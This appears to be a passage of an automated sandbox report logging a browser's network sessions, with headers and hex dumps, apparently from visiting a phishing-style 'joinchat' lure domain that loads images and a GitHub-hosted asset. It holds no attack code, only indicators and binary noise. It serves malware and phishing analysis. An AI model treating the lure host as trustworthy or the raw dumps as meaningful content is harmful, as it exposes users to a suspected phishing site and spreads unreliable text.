                          2024-05-27 22:30:16 UTC1369INData Raw: 7e 70 c1 a4 42 91 37 47 1a e9 03 98 27 55 44 e5 f2 6e 3e 6e 11 93 fb 7f 7d 41 33 f7 4f ed 81 5e 38 9c 24 a0 53 45 95 dd 03 26 9f 21 89 a7 97 c6 13 9a eb 93 d6 96 a4 90 c0 e6 ab a7 3c 93 e6 95 6f 40 18 db 48 11 7b 16 d5 2c ad e7 d8 b7 d8 81 19 31 a9 24 ef 3e 47 70 7b 72 fd 84 16 0d 39 b5 01 f2 92 cf 3e 69 0e 49 c3 c9 88 69 af 98 5a 9c cc 6d 69 10 df 01 be 44 78 c6 45 6e 78 ec 11 da 2c 5c ef 45 72 65 8d e4 ea 94 5b 67 dc 89 72 e4 8f 31 04 37 b7 e6 cd 94 e1 23 55 a7 2a 27 0f 63 6e f0 35 f0 14 22 60 d4 dc ce e8 d4 fd f6 61 0f 23 99 21 5c 37 50 23 2a 2f e4 4a c5 39 bc ac f9 c2 6c 27 29 5b 66 21 a2 66 ed de 2f d2 8d 5f bd 0b a9 f3 30 b6 b0 83 3d a7 6f dd 72 b9 10 66 6a 46 39 ce e8 1e bf 0a 6f dd 33 05 f4 34 49 8e 70 cd ac 3e 4e 52 2c 16 fa 17 cc a4 2c 48 ed ea
                          Data Ascii: ~pB7G'UDn>n}A3O^8$SE&!<o@H{,1$>Gp{r9>iIiZmiDxEnx,\Ere[gr17#U*'cn5"`a#!\7P#*/J9l')[f!f/_0=orfjF9o34Ip>NR,,H
                          2024-05-27 22:30:16 UTC1369INData Raw: 81 86 65 7d f4 e1 bb 2f 28 ef 3c 4f 2e ca f2 bc 36 81 eb 2a fd f0 83 f7 5e 44 97 66 6e 5f 4f 7f d6 14 be c0 5e 40 4a e1 3a 48 d2 df dc 84 cf 33 79 21 ea 6e 08 62 5b b1 f3 e6 3c 13 c6 44 4c a6 50 36 03 4d 06 1f 80 6c 22 a4 40 1d 49 1d fe 1a 49 a6 d6 43 f0 4a dd a1 7d 34 60 93 c4 b5 97 71 ee cc b7 a4 3e b3 80 7a 69 60 52 0f 26 0e 33 08 5d 13 a8 8d ec 03 15 f1 88 aa 1a 1d 20 de 03 f6 2f e6 50 1f 69 db c6 50 65 69 07 61 ca c1 d9 ae 0a 59 01 52 03 72 2a 6d a3 b9 92 0c fd 78 28 10 0f 62 dc f1 31 df 98 2f 59 41 40 bf d6 d0 6e 92 d0 72 99 94 01 4e d6 3c 86 35 f0 5c e0 9c bd cf 18 bf a7 1c e2 c6 88 a2 5d bd 4e a3 ea 48 77 e1 1b ec 85 6f a3 fb b0 e3 12 97 cc 94 fc 1d 30 37 ac 3c de 0b db 0d af 56 26 7f ba db 16 0b 4e 47 27 d3 6f f6 2a d6 52 97 5f 84 c1 30 7d b5 70
                          Data Ascii: e}/(<O.6*^Dfn_O^@J:H3y!nb[<DLP6Ml"@IICJ}4`q>zi`R&3] /PiPeiaYRr*mx(b1/YA@nrN<5\]NHwo07<V&NG'o*R_0}p
                          2024-05-27 22:30:16 UTC1369INData Raw: ae 59 9c 12 6e cf 58 a4 77 fd ef 78 3d ce 06 93 0c fb a6 5a b3 07 82 c2 57 99 9c 04 0c cd 2b 10 bd 83 f1 e8 84 63 73 81 2c e0 d7 0a e5 1b 79 3f 57 05 4c 0a 82 dd fd 11 f1 1a 85 8b a8 5c 91 ad 22 19 e3 25 f5 be 99 f5 f7 42 68 44 a1 71 9b c9 dc 91 09 15 ea b8 44 45 45 68 55 f2 c5 be 09 72 1a af af 90 a2 20 28 85 67 d4 12 56 56 e6 70 ae c4 fe 3f 5e 5a 9d 65 99 59 9e bc 0c d5 24 b3 3e 19 0d 70 05 4c ed 23 8a 1d f0 c6 27 6d 07 fa 98 45 eb 21 8a be cb b4 5d de e6 9b 41 79 54 7a ba 51 bb 4a 01 2e 2c c3 8d 9d 72 ae 2d 4e 29 f1 c2 90 98 ce d3 94 dd cb f9 65 66 d3 d2 10 45 d4 c9 c9 bd 19 3a 0b 95 5e a7 46 dc 37 df a5 c3 e5 22 80 47 74 f9 b3 2c 4d 61 51 49 16 4d af ed cb 5d c8 f8 d4 15 d6 f4 ff a8 fb fe 52 ac df 6d 9c 42 8b 5a d9 cd f5 0a 8d f3 a3 c4 45 dc 19 d5 e1
                          Data Ascii: YnXwx=ZW+cs,y?WL\"%BhDqDEEhUr (gVVp?^ZeY$>pL#'mE!]AyTzQJ.,r-N)efE:^F7"Gt,MaQIM]RmBZE
                          2024-05-27 22:30:16 UTC1369INData Raw: a5 9f 41 19 f4 cd 7e 57 c7 57 c0 00 57 26 69 07 14 68 ef 31 4e a1 8e 98 90 81 5b 1e 11 93 7f 8e c3 83 ef c6 3a b8 08 2f 4c 88 ef ee 61 5f c5 6d 57 85 15 6b 4d 3c 7b b1 4e 55 35 a7 bc f0 78 a0 68 f5 af fc 68 5f 35 56 40 59 1a 90 0e 51 9a 28 2c 2a 65 8b fc 47 f3 59 12 6c 07 bd 09 85 64 37 9b 20 af 6b 3a 4f 04 cd 95 02 56 c5 da 86 5c 42 d4 85 38 ec ba f6 a5 e5 4a 55 27 eb 70 e4 cc d3 ea 51 d4 6a 82 9c 11 d0 c6 c1 dd b6 58 0e a8 ae 06 1e 40 b3 83 db 4f 6e 93 ef cd 94 72 2a 08 c0 97 a1 6f 1a 1e 65 01 ee 70 c6 4a f3 07 1a 33 a1 89 34 d1 2a f6 72 3d 92 4c a7 d0 49 36 a0 8d 61 6c 5b e8 ea 69 73 da 4b c8 58 19 0a 9e 8a f3 9f d3 89 7a de 4d 8f e9 6e d6 5e 6d 4d 35 43 c4 da b0 76 4f c7 c8 39 c6 b8 bb 84 ee 18 99 1e 46 37 19 bd 40 46 90 45 67 a6 ab 46 87 13 0c 0e f5
                          Data Ascii: A~WWW&ih1N[:/La_mWkM<{NU5xhh_5V@YQ(,*eGYld7 k:OV\B8JU'pQjX@Onr*oepJ34*r=LI6al[isKXzMn^mM5CvO9F7@FEgF
                          2024-05-27 22:30:16 UTC1369INData Raw: 24 3f 60 73 e9 c2 a5 70 e1 c5 5e 64 71 89 2f 0a 78 6d 02 a6 2d 18 73 65 bf aa 0f 8e 0d fb 7b 82 49 0f f8 bd 05 37 64 2f ca 18 10 70 c6 65 57 c3 f4 9c d5 1f 43 37 d5 5e c4 63 7f 4b 20 10 56 a3 b4 64 2c c4 71 2a 33 91 43 ed 01 dc 91 d6 23 a9 38 d4 ce 90 6e 43 77 6a 40 ab ea 42 35 98 23 ed b2 b9 52 4f 82 9e 50 da e3 d2 bd 1d b7 9f 20 92 a3 ed c2 35 58 69 a1 f5 10 06 cf 82 13 93 46 a3 62 51 ea ae 3d 74 e4 69 eb 66 54 7b 6b 40 41 76 d1 fa 72 77 7a 4b 6e 40 a1 9a 71 0a 0f 92 d9 15 3c fc ae 8a fb 64 16 e7 0c 95 ea 02 1d a4 ed d6 a8 13 56 29 17 52 10 45 ce a9 55 d4 f4 ff ab 19 77 ca 1f 18 73 79 4f cf 47 89 76 ff dc 7e de b3 64 71 63 9d 0e e1 f4 e6 62 0f 0e d1 78 03 8c f3 e2 80 c3 c9 48 9f 95 00 62 76 71 66 c9 37 a8 29 d9 15 05 4a 00 5c b9 9a 36 a2 82 be 7d 51 6a
                          Data Ascii: $?`sp^dq/xm-se{I7d/peWC7^cK Vd,q*3C#8nCwj@B5#ROP 5XiFbQ=tifT{k@AvrwzKn@q<dV)REUwsyOGv~dqcbxHbvqf7)J\6}Qj
                          2024-05-27 22:30:16 UTC1369INData Raw: 7a fa 52 d1 3f 66 a8 bc aa 56 9f f7 b0 39 33 c1 a6 d0 e7 32 96 a0 94 8a a4 9e 77 b1 25 0f a9 e8 fb 10 49 36 ce 36 ad 44 04 83 8d d8 53 ac 59 b1 2a 11 9b aa 09 9f 76 e3 da b8 32 f9 59 41 4a 8b 71 87 31 49 45 b7 6b b8 5e ab 5a 8c 7e b4 e3 ae 50 8b 00 79 08 8a 52 e3 03 0e 44 59 d5 cc 49 01 a7 a3 03 4b c5 5d 7c 72 63 a3 e9 8f fa a4 21 09 1a 2a 62 b4 02 73 a4 88 0d d9 88 48 d4 90 86 3f 8f 71 26 00 6a 09 62 ce d3 23 09 b6 65 d8 ad de 37 0b 7c d0 81 4e 6a 78 c1 f3 0f f1 1b 46 9b fe 51 4e b9 ef 0e 5e 5f 76 13 43 a5 9e f3 8b db 1f cd 84 40 75 81 7d 72 f9 7c 8b 30 7d f4 d1 5b 6d 7a e5 c0 bd eb 46 f4 9b f7 a7 c9 1e 41 3a f2 dd b9 d7 5b b1 30 c5 e4 a6 20 6a d3 af 8d bb a0 4e 77 c4 03 ef 61 9b 1c ab 2d ab 71 e1 5b 10 bc e3 72 1c d6 37 91 b6 72 39 98 61 03 8b e7 89 e1
                          Data Ascii: zR?fV932w%I66DSY*v2YAJq1IEk^Z~PyRDYIK]|rc!*bsH?q&jb#e7|NjxFQN^_vC@u}r|0}[mzFA:[0 jNwa-q[r7r9a


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          18192.168.2.449762185.199.108.1334435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:16 UTC685OUTGET /AlexHostX/all.asset/c529c239acac01cd8bc1a76f349f7c3caebba766/580b57fcd9996e24bc43c543.png HTTP/1.1
                          Host: raw.githubusercontent.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://joinchat8g7135b.12trm.my.id/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:16 UTC803INHTTP/1.1 404 Not Found
                          Connection: close
                          Content-Length: 14
                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                          Strict-Transport-Security: max-age=31536000
                          X-Content-Type-Options: nosniff
                          X-Frame-Options: deny
                          X-XSS-Protection: 1; mode=block
                          Content-Type: text/plain; charset=utf-8
                          X-GitHub-Request-Id: E8D0:23DDAF:76EF29:87F364:66550978
                          Accept-Ranges: bytes
                          Date: Mon, 27 May 2024 22:30:16 GMT
                          Via: 1.1 varnish
                          X-Served-By: cache-nyc-kteb1890030-NYC
                          X-Cache: MISS
                          X-Cache-Hits: 0
                          X-Timer: S1716849017.747903,VS0,VE28
                          Vary: Authorization,Accept-Encoding,Origin
                          Access-Control-Allow-Origin: *
                          Cross-Origin-Resource-Policy: cross-origin
                          X-Fastly-Request-ID: dc59b705263bea00f4b2cb9decd9f3ac799cc5ee
                          Expires: Mon, 27 May 2024 22:35:16 GMT
                          Source-Age: 0
                          2024-05-27 22:30:16 UTC14INData Raw: 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64
                          Data Ascii: 404: Not Found


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          19192.168.2.44976335.190.80.14435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:16 UTC541OUTOPTIONS /report/v4?s=oUTLFvZiTMRAoK3Q93kizLBJ0hjl6jJKmwAUq%2ByJgtbCAC5MaNw%2BrPwdruGI22QcS0CFWdFYPpq3vlpyyniKdBb5IgK7XY3Bq2JL7ttD8hM0RFcCBZWo9Btb9hnLcuGWqiOI5ug%3D HTTP/1.1
                          Host: a.nel.cloudflare.com
                          Connection: keep-alive
                          Origin: https://rawcdn.githack.com
                          Access-Control-Request-Method: POST
                          Access-Control-Request-Headers: content-type
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:16 UTC336INHTTP/1.1 200 OK
                          content-length: 0
                          access-control-max-age: 86400
                          access-control-allow-methods: POST, OPTIONS
                          access-control-allow-origin: *
                          access-control-allow-headers: content-type, content-length
                          date: Mon, 27 May 2024 22:30:16 GMT
                          Via: 1.1 google
                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                          Connection: close


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          20192.168.2.449766188.114.97.34435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:17 UTC379OUTGET /vhsfhqpdhdsih6/img/maria.jpg HTTP/1.1
                          Host: joinchat8g7135b.12trm.my.id
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:17 UTC676INHTTP/1.1 200 OK
                          Date: Mon, 27 May 2024 22:30:17 GMT
                          Content-Type: image/jpeg
                          Content-Length: 57874
                          Connection: close
                          Last-Modified: Thu, 25 Aug 2022 04:34:44 GMT
                          Cache-Control: max-age=14400
                          CF-Cache-Status: HIT
                          Age: 5221
                          Accept-Ranges: bytes
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1A9o9BjgA7krFyDWS4fw%2FaeYD4q5tJeMMiRitZwQ2f7e4sdMgRp9AYCXbDnJHVjNHGN%2Bh27VMdhecI7hPQGDwtVVnoWggNz9p5kA6vqKnFOY1vHojz9i%2B3V8pDZ6gMFjKKw2etVc3WShuEjO5Z0%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 88a972d6193617d9-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-27 22:30:17 UTC693INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0b 0b 09 0c 11 0f 12 12 11 0f 11 11 13 16 1c 17 13 14 1a 15 11 11 18 21 18 1a 1d 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c2 00 11 08 02 01 03 24 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 03 01 02 04 05 06 00 07 ff c4 00 19 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 a3 99 0f 51 59 ee d5 26
                          Data Ascii: JFIFC!"$"$C$"QY&
                          2024-05-27 22:30:17 UTC1369INData Raw: 17 80 bf a1 be da 39 5a 70 9b 22 47 65 54 91 e4 c5 d2 6d 9d 1e c2 1b de d7 45 72 2f 03 00 6c 9b 23 79 d4 68 55 52 e0 b1 06 a3 51 b1 8d 23 51 21 91 a3 c9 66 7a 47 0b d0 62 67 45 4b d1 ec 3c c6 c4 8d d4 ca 7d 2b 59 4c 8e e0 97 97 9f 58 5b 5e 46 57 20 08 df 4d 6d a0 ae 92 cd 6c 29 ee 66 c3 59 63 5d 3a 67 8c 28 79 dd 94 83 ca 26 37 9b fa 4e 0e 8a 97 bc 29 49 d8 e1 ad 87 1b 5f 96 f4 b9 ac f4 3d ad 6d 2a 1c 95 ec 28 d3 ae 03 24 46 49 10 aa 68 04 b3 32 de cb 5b 4e 7d b1 f3 8f 4a f3 6f 53 15 96 6a f7 cf f4 98 3e 95 91 da c8 ee 6a 68 95 bc 8d 3f 91 41 3b 90 1f cd e4 9e d4 e0 ee 44 05 e6 73 3c fb d6 3c bb d4 1e 7d 3e bc ec b8 e6 bb 2d 2b 27 40 b0 a9 28 c8 29 ac 25 dd 0d f6 d1 d2 63 49 15 f2 2a 63 a5 14 79 11 f5 ce fc e3 26 5a 77 77 23 9a a1 0a af 1e bc c7 d5 0c 2d
                          Data Ascii: 9Zp"GeTmEr/l#yhURQ#Q!fzGbgEK<}+YLX[^FW Mml)fYc]:g(y&7N)I_=m*($FIh2[N}JoSj>jh?A;Ds<<}>-+'@()%cI*cy&Zww#-
                          2024-05-27 22:30:17 UTC1369INData Raw: d4 51 d9 01 3c f6 53 d3 29 5c e0 7b 43 9c ac 53 db fc cf d2 74 c1 b5 d6 19 fb 8d 1d 79 d2 95 4c 4b c8 e9 5a c4 9b 0c 72 65 84 a9 d3 c9 8b 3b 3d 25 96 2a 8e 92 b2 e0 39 e9 38 7d 37 4c 87 43 7d 46 2d 2d 0d e5 4e 99 c5 c8 dc 55 e5 a4 04 4e e7 ec 97 7b 9b d7 39 aa ae 2c 74 ee 37 f9 6d 06 b8 d6 12 97 62 94 7c 1d c5 14 e8 ed 55 46 c6 a1 f1 4f 53 b4 59 9e 8a ea b3 73 54 6d 39 19 c3 73 c2 e4 cf cd 74 d7 23 9a 86 42 99 9a 4e d6 6e 5b 4a 07 e4 4a 4b cc e0 b3 72 26 fc ea 88 f6 5a 55 5c 50 a7 a3 ac 9d 4e 9b 2c ea 6c 43 cb b4 79 ad 0c bb db 2a db 2b 9b d0 18 19 de 75 53 b4 8d 42 2b 33 b8 79 4b 46 35 91 8a 4a bc 3a f6 77 70 27 65 a1 46 e1 2b 6f 00 a3 35 6d c0 6d 60 6e ac f3 53 a4 1d 06 53 44 95 8c 19 15 0e 2b 71 5b 5a 5d 31 d5 db 34 93 8b a9 ed b3 fb e7 2e cb 35 a6 d3
                          Data Ascii: Q<S)\{CStyLKZre;=%*98}7LC}F--NUN{9,t7mb|UFOSYsTm9st#BNn[JJKr&ZU\PN,lCy*+uSB+3yKF5J:wp'eF+o5mm`nSSD+q[Z]14.5
                          2024-05-27 22:30:17 UTC1369INData Raw: f4 b5 b7 78 75 31 64 be 6a 0b 2d 64 42 c5 53 7a 88 2b 1f 2f 06 df 1e b9 a3 92 13 eb 29 a6 80 f8 56 11 04 1d 0b 0d 56 52 ff 00 97 be 5c ba 79 52 59 09 a2 ec 8a ab 8a 4b 92 cd 8f d7 64 3a 79 9d 57 63 58 39 97 15 8f 0a a5 1b f9 fa f9 ec 78 ee 42 01 56 6b 32 2c e4 d2 c6 23 2e 2e 9c 16 e9 12 63 10 17 30 a0 4b ad ce ad a4 45 95 a4 a2 b5 f6 97 9a 34 48 e0 14 27 ba 37 67 52 d2 3a 81 29 6c 69 b2 d2 75 ad 25 b3 99 51 56 ae a7 ba 67 67 50 ba 01 b9 f8 aa e3 5c 52 75 9a a8 d4 76 ca 2c ec eb 4d e7 29 c7 a9 b2 d1 bb 70 c2 75 fa 2c 47 80 d5 80 7e 69 b4 c1 6d bc e2 e2 b4 8a 9a e0 c4 47 04 8d 86 5f 75 96 96 d7 55 e0 55 79 05 d1 b0 dd 8c 55 cf 41 55 59 e3 1a cd c0 5b 6e ce 2b 42 bb 43 9e b6 36 e1 9b 1a 33 8d ca 90 c8 50 6a bb 80 51 27 31 2f 39 cc fb 3e 3e b9 f1 8a e4 5c 89
                          Data Ascii: xu1dj-dBSz+/)VVR\yRYKd:yWcX9xBVk2,#..c0KE4H'7gR:)liu%QVggP\Ruv,M)pu,G~imG_uUUyUAUY[n+BC63PjQ'1/9>>\
                          2024-05-27 22:30:17 UTC1369INData Raw: a7 9b e6 c8 1c 67 0d 18 e5 da a1 0e cd bd 75 5e 49 51 b6 57 5a 5c de 94 eb 5e 46 2d 21 61 77 d9 0a 3c f6 ee 34 aa ce bb d4 73 7a fc 74 b7 30 cd 72 9c ee 60 d5 c8 ce 72 28 2b da e4 22 35 88 92 1a b8 5d 18 58 41 4e d7 24 e6 8e 91 db 5e 20 92 09 2f 1d 2c 6d 3b 53 f3 e7 ed 31 f9 ad 0d ee 4a fb 8b ba e0 d1 24 2d 24 3c 2f a1 ec 5e 69 95 f6 6c 73 89 6d fe 78 e7 7d c5 2d c2 9a ac 7e b7 23 68 a8 89 29 82 23 16 8f 33 0b 9e c9 75 4d 2a a3 74 3a 32 75 f1 d1 35 3b 83 bd 55 ae 4f 91 ce 08 ac 2c 2d 62 7b e1 ba e2 6a c7 35 a7 23 91 a4 54 50 6d dd 3d a9 3a 41 30 1a e1 29 a0 7a 6e 63 94 02 29 88 9c 10 da b6 5d 2f 5d 70 31 58 df 13 27 b8 43 43 e3 9d b4 35 0c d6 35 1a e4 58 e9 71 da fe be b7 b5 cb d1 d2 0a 6b c8 ac cb d7 eb aa 27 48 9a 9c 77 a1 49 21 ef 6e dc ed 6b da 34 e5
                          Data Ascii: gu^IQWZ\^F-!aw<4szt0r`r(+"5]XAN$^ /,m;S1J$-$</^ilsmx}-~#h)#3uM*t:2u5;UO,-b{j5#TPm=:A0)znc)]/]p1X'CC55Xqk'HwI!nk4
                          2024-05-27 22:30:17 UTC1369INData Raw: 8e 20 0a 63 61 23 53 58 85 00 24 a7 84 ab 18 53 79 3a f8 6e 6a ba 70 5b 50 e9 05 02 87 ab 91 58 16 5c 99 00 d0 33 42 d4 1c 63 44 de d6 8d 3d 7e 4e cc 59 dd 7b 1a cb 97 30 4c 4c 88 35 42 a1 25 84 32 58 f3 43 97 d6 d4 b9 aa 76 97 95 82 1e 57 55 e7 aa e8 74 15 3b 58 36 15 f6 f0 86 7b e8 73 f8 fa d5 8f 12 a1 c7 3c 60 8b 06 54 2b 9b 93 0e cf b7 84 12 c6 a3 75 35 cb 11 e7 ec db 63 25 8d 9c 88 4e 72 23 8a 04 09 e5 ab 59 76 dd 54 58 73 d4 52 25 ab d8 d9 6b 14 bc d5 54 0d 31 5a c5 03 7e 26 60 d3 5f 01 ac fa d8 c4 40 dc 3e 4e 51 60 70 ac fa b3 99 bd 8a 51 74 a0 2c 93 00 a6 c3 8a 8b 5e ab 9e 05 6f 70 45 0d 87 0a 1c c6 44 65 f5 85 05 ff 00 2f 50 da d6 46 8f 8f 29 96 63 c5 a3 c9 de 66 1c 53 6f ce f6 b5 8d 15 a3 68 8a d1 a2 08 d1 b0 6f d6 63 a4 45 08 5b 6c b8 41 7c a3
                          Data Ascii: ca#SX$Sy:njp[PX\3BcD=~NY{0LL5B%2XCvWUt;X6{s<`T+u5c%Nr#YvTXsR%kT1Z~&`_@>NQ`pQt,^opEDe/PF)cfSohocE[lA|
                          2024-05-27 22:30:17 UTC1369INData Raw: c8 1e 95 08 9e b3 ad 7c b2 0e 1f a4 b8 cf ce be c7 eb 1d ee f7 ff 00 1a 5d 62 4a 9b c3 8d aa 13 2d 8a 37 02 c2 a3 86 57 fd 98 f6 ef a3 d8 c5 e4 22 e4 6a 7a db 75 b9 75 6d 83 8a db 2b 65 23 73 7d ba af bf 4e e4 ab 6e 7d 08 32 ba 95 86 16 3d 53 a7 87 32 ab 7c 86 9d 37 33 f5 29 53 f2 16 83 3c 96 41 a1 07 b9 61 cf 7e 12 13 e1 bc c1 1a c5 50 72 ab 8b 68 b6 6b f7 00 11 bd f2 83 2c a4 f2 b7 2b c5 5d 39 7f 6e ef 0c de d9 c7 59 7d 27 39 59 3f c8 74 6a e9 36 22 3f 55 74 73 85 f9 ef b3 d2 99 ac 2c 4e 9f 98 8b 4d ce 32 16 f5 e2 e2 60 d4 5e ea 57 ec d0 51 d6 2d 07 b0 9c 39 35 cb c6 74 fa 4d b7 2d 3f 65 5c 14 f5 ec 8f b7 19 da 60 e0 69 ca 0e 15 57 c3 f9 6d 3e 7a 45 7e 9e 0c a7 b1 fb 6c c8 1f 6a 2f da 83 c3 8f b6 ff 00 fb 4e f4 ae cb 26 e3 0d 18 8a 3d 22 9e 6b a4 18 71
                          Data Ascii: |]bJ-7W"jzuum+e#s}Nn}2=S2|73)S<Aa~Prhk,+]9nY}'9Y?tj6"?Uts,NM2`^WQ-95tM-?e\`iWm>zE~lj/N&="kq
                          2024-05-27 22:30:17 UTC1369INData Raw: ff 00 c1 ff 00 1e ff 00 72 7f 7a dd 74 9e 2f 2c fc cb ed 2f f8 57 ff 00 6d db 17 f2 46 f6 7f 90 f9 af c7 b1 86 7f 92 5a 3d 77 3b 26 54 27 2e 33 1a 87 b2 da 68 2d 29 a8 28 d4 d4 30 c3 0c 69 6c cf 41 d9 5b 4f d3 9b 9d d9 54 78 5b 5e b6 c5 b7 9a e4 9f b5 2e 21 ea bb ef d7 22 c3 c9 f1 5d b6 f2 b7 1c f3 8a 9b 19 c3 49 42 f3 74 5f 4e d6 6e 48 bf 99 be 29 57 ab 9f 9d 5f 06 b9 74 60 8e bf 6d 16 70 38 4e a4 65 b7 3b f1 ab f4 cd c3 9d b8 21 55 fa 96 47 23 31 2b e7 66 32 70 5e ac fb 9d 36 9e 29 fe 40 65 43 93 dc fe 8e 2f 4d ab d5 bd 06 87 f1 eb ea ff 00 1c 03 d5 83 dd 7e 37 7d b6 03 f6 8f 37 8f 69 91 f8 e8 ff 00 b6 ed 89 f9 23 7b 59 f2 5f c8 9f 1e f9 97 ad 15 75 8c 93 6d cd ec 9b b1 de b1 4e 35 28 d6 35 4a b4 d4 d9 8d 58 af aa 4a b3 e9 78 ae ac 0c 30 c6 8d 2e 33 28
                          Data Ascii: rzt/,/WmFZ=w;&T'.3h-)(0ilA[OTx[^.!"]IBt_NnH)W_t`mp8Ne;!UG#1+f2p^6)@eC/M~7}7i#{Y_umN5(5JXJx0.3(
                          2024-05-27 22:30:17 UTC1369INData Raw: 39 6f c0 c4 fc ab ec 7e 49 3f c8 7f 73 3a c5 14 51 5a 91 5d ab ca cc 55 e2 bd 8c 26 6e 03 df 3f cc 35 02 32 b1 f6 99 18 da 14 23 29 c9 3e 71 90 db 77 10 a9 03 fe eb fe 25 1a 17 56 77 88 a7 d5 0b f6 bc aa 3f e3 af e4 d2 9f 62 04 ce fb dd ea e1 30 48 08 37 fa 8b 7f 1f 4a 1f bb 3a aa fe dd 56 9b 71 ef 5e 36 1e cb 69 51 d2 d7 91 ea 0d fb c0 cc 0a f9 dd 5f 85 ea 57 f8 e9 d4 e9 73 2c f4 eb 76 e4 fe f3 a7 51 c1 4c d8 95 b7 7d fd 23 e9 6b 78 bb 5c 0b 29 f1 de af 15 f6 4f 9d 87 94 3f 3a fe 39 6d a9 bd b6 4f e0 e4 57 37 04 93 db 07 e5 2e f8 19 57 e5 5f 6f ef d8 5c be bf 52 6a c5 ec fc 55 ea 1b ca af c0 dc dc 2d 09 ed c8 08 b7 d7 c9 9d 75 97 60 2d 57 91 62 ee 5f 4e cb 56 26 4f e6 ff 00 1d a7 9e 4f 31 a0 65 a7 59 1c f7 57 b2 59 f1 c0 d6 d9 a7 c9 96 3f e3 ab e4 65 66
                          Data Ascii: 9o~I?s:QZ]U&n?52#)>qw%Vw?b0H7J:Vq^6iQ_Ws,vQL}#kx\)O?:9mOW7.W_o\RjU-u`-Wb_NV&OO1eYWY?ef
                          2024-05-27 22:30:17 UTC1369INData Raw: 4a 17 9b e3 27 14 ec 65 9e d7 9f b7 a7 fb 9f e3 3e d7 fc eb f9 57 ed df fc 70 f2 6f 4c 4f 4c 4a 6a 05 f2 2a 00 59 8e be 99 ac 4f 48 4f 48 42 bc 17 97 ef 74 e1 cc 7a 42 51 56 a0 c6 52 32 68 fd a3 54 c7 c7 06 f7 ab 8a 36 3e ab c8 1b 9d 49 ff 00 7e cf 8f 4a 5e 3d 38 cd 42 b3 ca c4 b2 73 8e e2 39 96 6a 1f 76 6d 0d b5 ed 52 25 35 89 a9 a9 72 fd 81 be d2 9c 5f 1e d1 33 cf ec d1 77 1a a9 53 5b 55 60 61 cc 4e 42 7a 82 31 fb 1d 82 af e4 ba 91 a4 30 fb 99 96 27 4e f8 e5 fe 1a c1 2b 56 41 a9 69 46 b5 b2 0f 9f e8 0e c5 c9 4d 4a 6b e4 c0 b5 13 21 cd 8d a8 04 e9 95 f9 1d da 34 64 06 52 81 21 30 98 5a 7a 93 d5 82 e9 ea 88 2c 13 d4 9e a4 f5 44 36 8d 5b e5 ab 1e 55 bc 73 9c c4 e7 3a 76 47 e9 ae aa d1 62 13 31 cf ee 65 1f 19 2d aa 89 9c a6 e3 79 43 f9 7a 51 fb 77 2a 3f 6d
                          Data Ascii: J'e>WpoLOLJj*YOHOHBtzBQVR2hT6>I~J^=8Bs9jvmR%5r_3wS[U`aNBz10'N+VAiFMJk!4dR!0Zz,D6[Us:vGb1e-yCzQw*?m


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          21192.168.2.449764184.28.90.27443
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:17 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          Accept-Encoding: identity
                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                          Range: bytes=0-2147483646
                          User-Agent: Microsoft BITS/7.8
                          Host: fs.microsoft.com
                          2024-05-27 22:30:17 UTC515INHTTP/1.1 200 OK
